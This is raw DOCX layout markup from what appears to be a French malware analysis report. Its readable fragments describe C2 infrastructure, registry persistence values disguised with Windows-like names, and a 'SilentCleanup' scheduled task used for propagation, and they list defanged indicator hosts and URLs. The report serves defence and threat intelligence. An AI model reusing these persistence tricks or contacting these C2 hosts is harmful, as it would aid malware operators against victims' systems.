                          <a:lnTo>
                            <a:pt x="3460749" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3460749" y="565784"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1501139" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3460115" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3460115" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1501139" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1501139" y="565784"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1500505" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1500505" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5657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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2401569</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1893579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4270375" cy="565784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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0375" cy="5657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70375" h="565784">
                          <a:moveTo>
                            <a:pt x="1959609" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4270375" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4270375" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1959609" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1959609" y="565784"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1958975" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1958975" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5657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0592" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2886710</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6285239</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="445135" cy="198754"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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5135" cy="198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5135" h="198754">
                          <a:moveTo>
                            <a:pt x="0" y="198754"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="445135" y="198754"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="445135" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="198754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980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1893579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5778500" cy="4817110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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4817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4817110">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="4817110"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="4813935"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5778500" y="4813935"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4283075"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="4283075"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3575685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="3575685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2868295"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="2868295"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1984375"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="1984375"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1276985"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="1276985"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="569595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5772149" y="569595"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="577850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0832" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2401569</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1899929</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="4804410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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8044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804410">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="480441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1856" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4361179</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1899929</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="4804410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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8044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804410">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="480441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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6672579</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1893579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="4817110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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817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817110">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="481711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0048" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4248785</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2112019</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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6912" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1982470</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2112019</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3337560" cy="5839460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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7560" cy="58394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37560" h="5839460">
                          <a:moveTo>
                            <a:pt x="3336925" y="5640070"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3336925" y="5839460"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2237740" y="5640705"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3337560" y="5640705"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="5523230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="5323840"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1099185" y="5323840"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1099185" y="5523230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="5324475"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1099819" y="5324475"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904875" y="4372610"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="904875" y="4173220"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1350009" y="4371975"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="904239" y="4371975"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1349375" y="4173220"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1349375" y="4372610"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904239" y="4173855"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1350009" y="4173855"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904875" y="3754120"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="904875" y="3554730"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1759585" y="3554730"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1759585" y="3754120"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904239" y="3555365"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1760219" y="3555365"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904875" y="3046730"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="904875" y="2847340"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2085975" y="2847340"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2085975" y="3046730"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904239" y="2847975"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2086609" y="2847975"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904875" y="2250440"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="904875" y="2051049"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1840865" y="2051049"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1840865" y="2250440"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904239" y="2051685"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1841499" y="2051685"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904875" y="1455420"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="904875" y="1256030"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2004694" y="1256030"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2004694" y="1455420"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904239" y="1256665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2005329" y="1256665"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904875" y="854709"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="904875" y="655319"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2168525" y="655319"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2168525" y="854709"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904239" y="655955"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2169160" y="655955"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904875" y="640079"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="904875" y="440690"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2085975" y="440690"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2085975" y="640079"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="904239" y="441325"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2086609" y="441325"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1167765" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="116776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3056" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1638300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7752089</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3147059" cy="415290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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7059" cy="4152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47059" h="415290">
                          <a:moveTo>
                            <a:pt x="635" y="415290"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="215900"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3146425" y="215900"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3146425" y="415290"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3147059" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2582545" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="258254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7152" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6460490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8182619</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="200659" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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65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59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200024" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="200024" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="20065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12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8398519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1346199" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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19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6199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345565" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1345565" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="134619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227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6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329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6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957845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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quitethepastry[.]ru</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="34"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> ou </w:t>
                        </w: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104.194.140[.]6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) afin de maintenir un réseau résilient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5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1140483</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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serveurs C2. Le tableau ci-dessous détaille l'ensemble des modifications apportées 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6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1313838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3594275" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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42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registre observées au cours de l'analyse fin janvier 2026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7392" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2499995</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1905023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1839478" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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94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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Chemin d'</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle07"/>
                            <w:spacing w:val="1"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">accès à la clé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8416" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4978400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2012338</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1114644" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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46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Données écrites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9440" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1143635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2012338</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1052199" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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21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URL demandée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0464" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2513965</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2096993</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1752396" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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39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registre :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14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2465335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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2512" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2906395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2537683</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1281810" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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18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WindowsUpdates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3536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2553600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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2641865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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graph[.]org/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5584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2730130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2259158" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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bold.zsjtn41091.workers[.]dev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6608" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2906395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2752948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1261160" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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11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WindowsResponby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76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2818395</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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kyjfkyr-12-06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86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3172725</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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96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3349255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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bold.zsjtn41091.wo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0704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3349255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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@myrain/Xh1Lta2Ccro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1728" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2906395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3353023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1097711" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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771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WindowsDetect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27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3525785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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rkers[.]dev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37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3880115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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4056645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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teletype[.]in/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5824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4144910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2105767" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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hxxps://quitethepastry[.]ru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6848" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2906395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4148678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="934681" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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468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URLTeletype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78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4233175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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@myrain/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88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4409705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Xh1Lta2Ccro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99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4764035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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09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4940565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1416069" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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quitethepastry[.]r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1968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4940565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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f8bfl6sp-01-02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2992" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2906395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4944333</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1179435" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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943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WindowsTelegra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40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5117095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="112807" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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80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5471425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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hxxps://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6064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5471425</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1799545" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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hxxps://moment-cat-qld-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7088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5647955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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place.trycloudflare[.]com/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81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5647955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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telegra[.]ph/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9136" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2906395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5651723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="852956" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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95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URLTelegra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01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5824485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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f8bfl6sp-01-02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1184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5824485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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sylvilagus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22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6178815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1262678" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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hxxps:/t[.]me/s/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3232" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4396740</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6267080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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104.194.140[.]6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4256" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2906395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6270848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="444334" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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33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IpURL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6355345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="572420" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8"/>
                          </w:rPr>
                          <w:t xml:space="preserve">teotori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6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6955813</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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Cette approche garantit la stabilité de la chaîne d'infection, car chaque valeur enregistrée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7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7129168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3435436" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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543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 le registre sera utilisée pour les étapes suivantes.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8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7392908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1118067" cy="190271"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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8067" cy="19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9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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.3.2.2.2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Tâche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9376" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2001519</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7420833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2839680" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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968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SilentCleanup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: Propagation et infection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0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7737698</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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Ensuite, une deuxième tâche planifiée, nommée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SilentCleanup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, est créée dans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1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7952963</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
